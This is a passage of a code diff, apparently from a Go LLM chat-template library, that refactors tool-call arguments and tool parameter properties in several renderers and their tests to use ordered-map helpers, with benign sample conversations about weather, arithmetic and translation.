Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -185,9 +185,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}},
|
"city": {Type: api.PropertyType{"string"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -238,13 +238,13 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"city": "London"},
|
Arguments: testArgs(map[string]any{"city": "London"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -259,9 +259,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}},
|
"city": {Type: api.PropertyType{"string"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -304,13 +304,13 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
msgs: []api.Message{
|
msgs: []api.Message{
|
||||||
{Role: "user", Content: "What's the weather in Paris and London? Also, what's 2+2?"},
|
{Role: "user", Content: "What's the weather in Paris and London? Also, what's 2+2?"},
|
||||||
{Role: "assistant", Content: "", Thinking: "I need to check the weather for both cities and calculate 2+2. Let me start with the weather calls.", ToolCalls: []api.ToolCall{
|
{Role: "assistant", Content: "", Thinking: "I need to check the weather for both cities and calculate 2+2. Let me start with the weather calls.", ToolCalls: []api.ToolCall{
|
||||||
{Function: api.ToolCallFunction{Name: "get_weather", Arguments: api.ToolCallFunctionArguments{"city": "Paris"}}},
|
{Function: api.ToolCallFunction{Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"})}},
|
||||||
{Function: api.ToolCallFunction{Name: "get_weather", Arguments: api.ToolCallFunctionArguments{"city": "London"}}},
|
{Function: api.ToolCallFunction{Name: "get_weather", Arguments: testArgs(map[string]any{"city": "London"})}},
|
||||||
}},
|
}},
|
||||||
{Role: "tool", Content: "Sunny, 22°C", ToolCallID: "call1"},
|
{Role: "tool", Content: "Sunny, 22°C", ToolCallID: "call1"},
|
||||||
{Role: "tool", Content: "Rainy, 15°C", ToolCallID: "call2"},
|
{Role: "tool", Content: "Rainy, 15°C", ToolCallID: "call2"},
|
||||||
{Role: "assistant", Content: "", Thinking: "Now I have the weather data. Let me calculate 2+2.", ToolCalls: []api.ToolCall{
|
{Role: "assistant", Content: "", Thinking: "Now I have the weather data. Let me calculate 2+2.", ToolCalls: []api.ToolCall{
|
||||||
{Function: api.ToolCallFunction{Name: "calculate", Arguments: api.ToolCallFunctionArguments{"expression": "2+2"}}},
|
{Function: api.ToolCallFunction{Name: "calculate", Arguments: testArgs(map[string]any{"expression": "2+2"})}},
|
||||||
}},
|
}},
|
||||||
{Role: "tool", Content: "4", ToolCallID: "call3"},
|
{Role: "tool", Content: "4", ToolCallID: "call3"},
|
||||||
{Role: "assistant", Content: "Based on the weather data, Paris is sunny at 22°C and London is rainy at 15°C. Also, 2+2 equals 4.", Thinking: "Perfect! I have all the information needed to provide a complete answer."},
|
{Role: "assistant", Content: "Based on the weather data, Paris is sunny at 22°C and London is rainy at 15°C. Also, 2+2 equals 4.", Thinking: "Perfect! I have all the information needed to provide a complete answer."},
|
||||||
|
|
@ -322,9 +322,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}},
|
"city": {Type: api.PropertyType{"string"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -334,9 +334,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
Name: "calculate",
|
Name: "calculate",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"expression": {Type: api.PropertyType{"string"}},
|
"expression": {Type: api.PropertyType{"string"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -389,7 +389,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
{
|
{
|
||||||
Role: "assistant",
|
Role: "assistant",
|
||||||
ToolCalls: []api.ToolCall{
|
ToolCalls: []api.ToolCall{
|
||||||
{Function: api.ToolCallFunction{Name: "get_user", Arguments: map[string]any{"id": "123"}}},
|
{Function: api.ToolCallFunction{Name: "get_user", Arguments: testArgs(map[string]any{"id": "123"})}},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{Role: "tool", Content: `{"name": "John", "age": 30, "active": true}`},
|
{Role: "tool", Content: `{"name": "John", "age": 30, "active": true}`},
|
||||||
|
|
@ -401,7 +401,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
Name: "get_user",
|
Name: "get_user",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{"id": {Type: api.PropertyType{"string"}}},
|
Properties: testPropsMap(map[string]api.ToolProperty{"id": {Type: api.PropertyType{"string"}}}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -450,9 +450,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
ToolCalls: []api.ToolCall{
|
ToolCalls: []api.ToolCall{
|
||||||
{Function: api.ToolCallFunction{
|
{Function: api.ToolCallFunction{
|
||||||
Name: "create",
|
Name: "create",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"data": map[string]any{"nested": "value", "count": 42},
|
"data": map[string]any{"nested": "value", "count": 42},
|
||||||
},
|
}),
|
||||||
}},
|
}},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -465,7 +465,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
Name: "create",
|
Name: "create",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{"data": {Type: api.PropertyType{"object"}}},
|
Properties: testPropsMap(map[string]api.ToolProperty{"data": {Type: api.PropertyType{"object"}}}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -512,7 +512,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
{
|
{
|
||||||
Role: "assistant",
|
Role: "assistant",
|
||||||
ToolCalls: []api.ToolCall{
|
ToolCalls: []api.ToolCall{
|
||||||
{Function: api.ToolCallFunction{Name: "translate", Arguments: map[string]any{"text": "你好"}}},
|
{Function: api.ToolCallFunction{Name: "translate", Arguments: testArgs(map[string]any{"text": "你好"})}},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{Role: "tool", Content: "Hello"},
|
{Role: "tool", Content: "Hello"},
|
||||||
|
|
@ -524,9 +524,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
Name: "translate",
|
Name: "translate",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"text": {Type: api.PropertyType{"string"}},
|
"text": {Type: api.PropertyType{"string"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
|
||||||
|
|
@ -100,8 +100,8 @@ func (r *Olmo3Renderer) Render(messages []api.Message, tools []api.Tool, _ *api.
|
||||||
sb.WriteString("(")
|
sb.WriteString("(")
|
||||||
|
|
||||||
// Get sorted keys for deterministic output
|
// Get sorted keys for deterministic output
|
||||||
keys := make([]string, 0, len(tc.Function.Arguments))
|
keys := make([]string, 0, tc.Function.Arguments.Len())
|
||||||
for k := range tc.Function.Arguments {
|
for k := range tc.Function.Arguments.All() {
|
||||||
keys = append(keys, k)
|
keys = append(keys, k)
|
||||||
}
|
}
|
||||||
sort.Strings(keys)
|
sort.Strings(keys)
|
||||||
|
|
@ -110,7 +110,8 @@ func (r *Olmo3Renderer) Render(messages []api.Message, tools []api.Tool, _ *api.
|
||||||
if k > 0 {
|
if k > 0 {
|
||||||
sb.WriteString(", ")
|
sb.WriteString(", ")
|
||||||
}
|
}
|
||||||
value, err := json.Marshal(tc.Function.Arguments[key])
|
val, _ := tc.Function.Arguments.Get(key)
|
||||||
|
value, err := json.Marshal(val)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return "", err
|
return "", err
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -53,9 +53,9 @@ func TestOlmo3Renderer(t *testing.T) {
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {Type: api.PropertyType{"string"}, Description: "The city"},
|
"location": {Type: api.PropertyType{"string"}, Description: "The city"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -80,9 +80,9 @@ func TestOlmo3Renderer(t *testing.T) {
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {Type: api.PropertyType{"string"}, Description: "The city"},
|
"location": {Type: api.PropertyType{"string"}, Description: "The city"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -108,9 +108,9 @@ func TestOlmo3Renderer(t *testing.T) {
|
||||||
ID: "call_1",
|
ID: "call_1",
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "San Francisco",
|
"location": "San Francisco",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -126,9 +126,9 @@ func TestOlmo3Renderer(t *testing.T) {
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {Type: api.PropertyType{"string"}, Description: "The city"},
|
"location": {Type: api.PropertyType{"string"}, Description: "The city"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -172,14 +172,14 @@ func TestOlmo3Renderer(t *testing.T) {
|
||||||
ID: "call_1",
|
ID: "call_1",
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"location": "San Francisco"},
|
Arguments: testArgs(map[string]any{"location": "San Francisco"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
ID: "call_2",
|
ID: "call_2",
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"location": "New York"},
|
Arguments: testArgs(map[string]any{"location": "New York"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -194,9 +194,9 @@ func TestOlmo3Renderer(t *testing.T) {
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {Type: api.PropertyType{"string"}},
|
"location": {Type: api.PropertyType{"string"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -227,10 +227,10 @@ func TestOlmo3Renderer(t *testing.T) {
|
||||||
ID: "call_1",
|
ID: "call_1",
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "book_flight",
|
Name: "book_flight",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgsOrdered([]orderedArg{
|
||||||
"from": "SFO",
|
{"from", "SFO"},
|
||||||
"to": "NYC",
|
{"to", "NYC"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -243,10 +243,10 @@ func TestOlmo3Renderer(t *testing.T) {
|
||||||
Name: "book_flight",
|
Name: "book_flight",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsOrdered([]orderedProp{
|
||||||
"from": {Type: api.PropertyType{"string"}},
|
{"from", api.ToolProperty{Type: api.PropertyType{"string"}}},
|
||||||
"to": {Type: api.PropertyType{"string"}},
|
{"to", api.ToolProperty{Type: api.PropertyType{"string"}}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
|
||||||
|
|
@ -78,7 +78,7 @@ func TestOlmo3ThinkRenderer(t *testing.T) {
|
||||||
ID: "call_1",
|
ID: "call_1",
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"location": "San Francisco"},
|
Arguments: testArgs(map[string]any{"location": "San Francisco"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
|
||||||
|
|
@ -96,7 +96,7 @@ func (r *Qwen3CoderRenderer) Render(messages []api.Message, tools []api.Tool, _
|
||||||
}
|
}
|
||||||
sb.WriteString("\n<parameters>")
|
sb.WriteString("\n<parameters>")
|
||||||
|
|
||||||
for name, prop := range tool.Function.Parameters.Properties {
|
for name, prop := range tool.Function.Parameters.Properties.All() {
|
||||||
sb.WriteString("\n<parameter>")
|
sb.WriteString("\n<parameter>")
|
||||||
sb.WriteString("\n<name>" + name + "</name>")
|
sb.WriteString("\n<name>" + name + "</name>")
|
||||||
|
|
||||||
|
|
@ -147,7 +147,7 @@ func (r *Qwen3CoderRenderer) Render(messages []api.Message, tools []api.Tool, _
|
||||||
}
|
}
|
||||||
for _, toolCall := range message.ToolCalls {
|
for _, toolCall := range message.ToolCalls {
|
||||||
sb.WriteString("\n<tool_call>\n<function=" + toolCall.Function.Name + ">")
|
sb.WriteString("\n<tool_call>\n<function=" + toolCall.Function.Name + ">")
|
||||||
for name, value := range toolCall.Function.Arguments {
|
for name, value := range toolCall.Function.Arguments.All() {
|
||||||
valueStr := formatToolCallArgument(value)
|
valueStr := formatToolCallArgument(value)
|
||||||
sb.WriteString("\n<parameter=" + name + ">\n" + valueStr + "\n</parameter>")
|
sb.WriteString("\n<parameter=" + name + ">\n" + valueStr + "\n</parameter>")
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -39,9 +39,9 @@ Hello, how are you?<|im_end|>
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"unit": "fahrenheit",
|
"unit": "fahrenheit",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -55,7 +55,7 @@ Hello, how are you?<|im_end|>
|
||||||
Description: "Get the current weather in a given location",
|
Description: "Get the current weather in a given location",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Required: []string{"unit"},
|
Required: []string{"unit"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"unit": {Type: api.PropertyType{"string"}, Enum: []any{"celsius", "fahrenheit"}, Description: "The unit of temperature"},
|
"unit": {Type: api.PropertyType{"string"}, Enum: []any{"celsius", "fahrenheit"}, Description: "The unit of temperature"},
|
||||||
// TODO(drifkin): add multiple params back once we have predictable
|
// TODO(drifkin): add multiple params back once we have predictable
|
||||||
// order via some sort of ordered map type (see
|
// order via some sort of ordered map type (see
|
||||||
|
|
@ -63,7 +63,7 @@ Hello, how are you?<|im_end|>
|
||||||
/*
|
/*
|
||||||
"location": {Type: api.PropertyType{"string"}, Description: "The city and state, e.g. San Francisco, CA"},
|
"location": {Type: api.PropertyType{"string"}, Description: "The city and state, e.g. San Francisco, CA"},
|
||||||
*/
|
*/
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
}},
|
}},
|
||||||
},
|
},
|
||||||
|
|
@ -140,19 +140,19 @@ That sounds nice! What about New York?<|im_end|>
|
||||||
{Role: "system", Content: "You are a helpful assistant with access to tools."},
|
{Role: "system", Content: "You are a helpful assistant with access to tools."},
|
||||||
{Role: "user", Content: "call double(1) and triple(2)"},
|
{Role: "user", Content: "call double(1) and triple(2)"},
|
||||||
{Role: "assistant", Content: "I'll call double(1) and triple(2) for you.", ToolCalls: []api.ToolCall{
|
{Role: "assistant", Content: "I'll call double(1) and triple(2) for you.", ToolCalls: []api.ToolCall{
|
||||||
{Function: api.ToolCallFunction{Name: "double", Arguments: map[string]any{"number": "1"}}},
|
{Function: api.ToolCallFunction{Name: "double", Arguments: testArgs(map[string]any{"number": "1"})}},
|
||||||
{Function: api.ToolCallFunction{Name: "triple", Arguments: map[string]any{"number": "2"}}},
|
{Function: api.ToolCallFunction{Name: "triple", Arguments: testArgs(map[string]any{"number": "2"})}},
|
||||||
}},
|
}},
|
||||||
{Role: "tool", Content: "{\"number\": 2}", ToolName: "double"},
|
{Role: "tool", Content: "{\"number\": 2}", ToolName: "double"},
|
||||||
{Role: "tool", Content: "{\"number\": 6}", ToolName: "triple"},
|
{Role: "tool", Content: "{\"number\": 6}", ToolName: "triple"},
|
||||||
},
|
},
|
||||||
tools: []api.Tool{
|
tools: []api.Tool{
|
||||||
{Function: api.ToolFunction{Name: "double", Description: "Double a number", Parameters: api.ToolFunctionParameters{Properties: map[string]api.ToolProperty{
|
{Function: api.ToolFunction{Name: "double", Description: "Double a number", Parameters: api.ToolFunctionParameters{Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"number": {Type: api.PropertyType{"string"}, Description: "The number to double"},
|
"number": {Type: api.PropertyType{"string"}, Description: "The number to double"},
|
||||||
}}}},
|
})}}},
|
||||||
{Function: api.ToolFunction{Name: "triple", Description: "Triple a number", Parameters: api.ToolFunctionParameters{Properties: map[string]api.ToolProperty{
|
{Function: api.ToolFunction{Name: "triple", Description: "Triple a number", Parameters: api.ToolFunctionParameters{Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"number": {Type: api.PropertyType{"string"}, Description: "The number to triple"},
|
"number": {Type: api.PropertyType{"string"}, Description: "The number to triple"},
|
||||||
}}}},
|
})}}},
|
||||||
},
|
},
|
||||||
expected: `<|im_start|>system
|
expected: `<|im_start|>system
|
||||||
You are a helpful assistant with access to tools.
|
You are a helpful assistant with access to tools.
|
||||||
|
|
@ -259,9 +259,9 @@ I'll tell you something interesting about cats`,
|
||||||
{Role: "assistant", ToolCalls: []api.ToolCall{
|
{Role: "assistant", ToolCalls: []api.ToolCall{
|
||||||
{Function: api.ToolCallFunction{
|
{Function: api.ToolCallFunction{
|
||||||
Name: "echo",
|
Name: "echo",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"payload": map[string]any{"foo": "bar"},
|
"payload": map[string]any{"foo": "bar"},
|
||||||
},
|
}),
|
||||||
}},
|
}},
|
||||||
}},
|
}},
|
||||||
{Role: "tool", Content: "{\"payload\": {\"foo\": \"bar\"}}", ToolName: "echo"},
|
{Role: "tool", Content: "{\"payload\": {\"foo\": \"bar\"}}", ToolName: "echo"},
|
||||||
|
|
|
||||||
|
|
@ -337,7 +337,7 @@ Let me analyze this image.`,
|
||||||
Role: "assistant",
|
Role: "assistant",
|
||||||
Content: "I'll check.",
|
Content: "I'll check.",
|
||||||
ToolCalls: []api.ToolCall{
|
ToolCalls: []api.ToolCall{
|
||||||
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: map[string]any{"location": "Paris", "unit": "celsius"}}},
|
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{Role: "user", Content: "<tool_response>\n18\n</tool_response>"},
|
{Role: "user", Content: "<tool_response>\n18\n</tool_response>"},
|
||||||
|
|
@ -367,8 +367,8 @@ Thanks!<|im_end|>
|
||||||
Role: "assistant",
|
Role: "assistant",
|
||||||
Content: "before",
|
Content: "before",
|
||||||
ToolCalls: []api.ToolCall{
|
ToolCalls: []api.ToolCall{
|
||||||
{Function: api.ToolCallFunction{Name: "add", Arguments: map[string]any{"a": 2, "b": 3}}},
|
{Function: api.ToolCallFunction{Name: "add", Arguments: testArgsOrdered([]orderedArg{{"a", 2}, {"b", 3}})}},
|
||||||
{Function: api.ToolCallFunction{Name: "mul", Arguments: map[string]any{"x": 4, "y": 5}}},
|
{Function: api.ToolCallFunction{Name: "mul", Arguments: testArgsOrdered([]orderedArg{{"x", 4}, {"y", 5}})}},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -387,7 +387,7 @@ before
|
||||||
name: "consecutive tool responses grouped",
|
name: "consecutive tool responses grouped",
|
||||||
msgs: []api.Message{
|
msgs: []api.Message{
|
||||||
{Role: "user", Content: "Compute results"},
|
{Role: "user", Content: "Compute results"},
|
||||||
{Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "job", Arguments: map[string]any{"n": 1}}}}},
|
{Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "job", Arguments: testArgs(map[string]any{"n": 1})}}}},
|
||||||
{Role: "tool", Content: "5", ToolName: "job"},
|
{Role: "tool", Content: "5", ToolName: "job"},
|
||||||
{Role: "tool", Content: "6", ToolName: "job"},
|
{Role: "tool", Content: "6", ToolName: "job"},
|
||||||
},
|
},
|
||||||
|
|
@ -412,7 +412,7 @@ ok
|
||||||
name: "last message is tool then prefill",
|
name: "last message is tool then prefill",
|
||||||
msgs: []api.Message{
|
msgs: []api.Message{
|
||||||
{Role: "user", Content: "run"},
|
{Role: "user", Content: "run"},
|
||||||
{Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "exec", Arguments: map[string]any{"cmd": "ls"}}}}},
|
{Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "exec", Arguments: testArgs(map[string]any{"cmd": "ls"})}}}},
|
||||||
{Role: "tool", Content: "done", ToolName: "exec"},
|
{Role: "tool", Content: "done", ToolName: "exec"},
|
||||||
},
|
},
|
||||||
expected: `<|im_start|>user
|
expected: `<|im_start|>user
|
||||||
|
|
@ -447,7 +447,7 @@ done
|
||||||
Role: "assistant",
|
Role: "assistant",
|
||||||
Content: "I'll check.",
|
Content: "I'll check.",
|
||||||
ToolCalls: []api.ToolCall{
|
ToolCalls: []api.ToolCall{
|
||||||
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: map[string]any{"location": "Paris", "unit": "celsius"}}},
|
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{Role: "user", Content: "<tool_response>\n18\n</tool_response>"},
|
{Role: "user", Content: "<tool_response>\n18\n</tool_response>"},
|
||||||
|
|
@ -477,7 +477,7 @@ Thanks!<|im_end|>
|
||||||
Role: "assistant",
|
Role: "assistant",
|
||||||
Content: "I'll check.",
|
Content: "I'll check.",
|
||||||
ToolCalls: []api.ToolCall{
|
ToolCalls: []api.ToolCall{
|
||||||
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: map[string]any{"location": "Paris", "unit": "celsius"}}},
|
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{Role: "user", Content: "\n\n\n\n<tool_response>\n18\n</tool_response> extra\n\n\n\n\n\n"},
|
{Role: "user", Content: "\n\n\n\n<tool_response>\n18\n</tool_response> extra\n\n\n\n\n\n"},
|
||||||
|
|
|
||||||
|
|
@ -128,10 +128,10 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
|
||||||
// {
|
// {
|
||||||
// Function: api.ToolCallFunction{
|
// Function: api.ToolCallFunction{
|
||||||
// Name: "get-current-weather",
|
// Name: "get-current-weather",
|
||||||
// Arguments: map[string]any{
|
// Arguments: testArgs(map[string]any{
|
||||||
// "location": "New York",
|
// "location": "New York",
|
||||||
// "unit": "fahrenheit",
|
// "unit": "fahrenheit",
|
||||||
// },
|
// }),
|
||||||
// },
|
// },
|
||||||
// },
|
// },
|
||||||
// },
|
// },
|
||||||
|
|
@ -148,7 +148,7 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
|
||||||
// Parameters: api.ToolFunctionParameters{
|
// Parameters: api.ToolFunctionParameters{
|
||||||
// Type: "object",
|
// Type: "object",
|
||||||
// Required: []string{"location"},
|
// Required: []string{"location"},
|
||||||
// Properties: map[string]api.ToolProperty{
|
// Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
// "location": {
|
// "location": {
|
||||||
// Type: api.PropertyType{"string"},
|
// Type: api.PropertyType{"string"},
|
||||||
// Description: "The city and state, e.g. San Francisco, CA",
|
// Description: "The city and state, e.g. San Francisco, CA",
|
||||||
|
|
@ -158,7 +158,7 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
|
||||||
// Enum: []any{"celsius", "fahrenheit"},
|
// Enum: []any{"celsius", "fahrenheit"},
|
||||||
// Description: "The temperature unit",
|
// Description: "The temperature unit",
|
||||||
// },
|
// },
|
||||||
// },
|
// }),
|
||||||
// },
|
// },
|
||||||
// },
|
// },
|
||||||
// },
|
// },
|
||||||
|
|
@ -216,19 +216,19 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
|
||||||
// {
|
// {
|
||||||
// Function: api.ToolCallFunction{
|
// Function: api.ToolCallFunction{
|
||||||
// Name: "add",
|
// Name: "add",
|
||||||
// Arguments: map[string]any{
|
// Arguments: testArgs(map[string]any{
|
||||||
// "a": 2,
|
// "a": 2,
|
||||||
// "b": 3,
|
// "b": 3,
|
||||||
// },
|
// }),
|
||||||
// },
|
// },
|
||||||
// },
|
// },
|
||||||
// {
|
// {
|
||||||
// Function: api.ToolCallFunction{
|
// Function: api.ToolCallFunction{
|
||||||
// Name: "multiply",
|
// Name: "multiply",
|
||||||
// Arguments: map[string]any{
|
// Arguments: testArgs(map[string]any{
|
||||||
// "x": 4,
|
// "x": 4,
|
||||||
// "y": 5,
|
// "y": 5,
|
||||||
// },
|
// }),
|
||||||
// },
|
// },
|
||||||
// },
|
// },
|
||||||
// },
|
// },
|
||||||
|
|
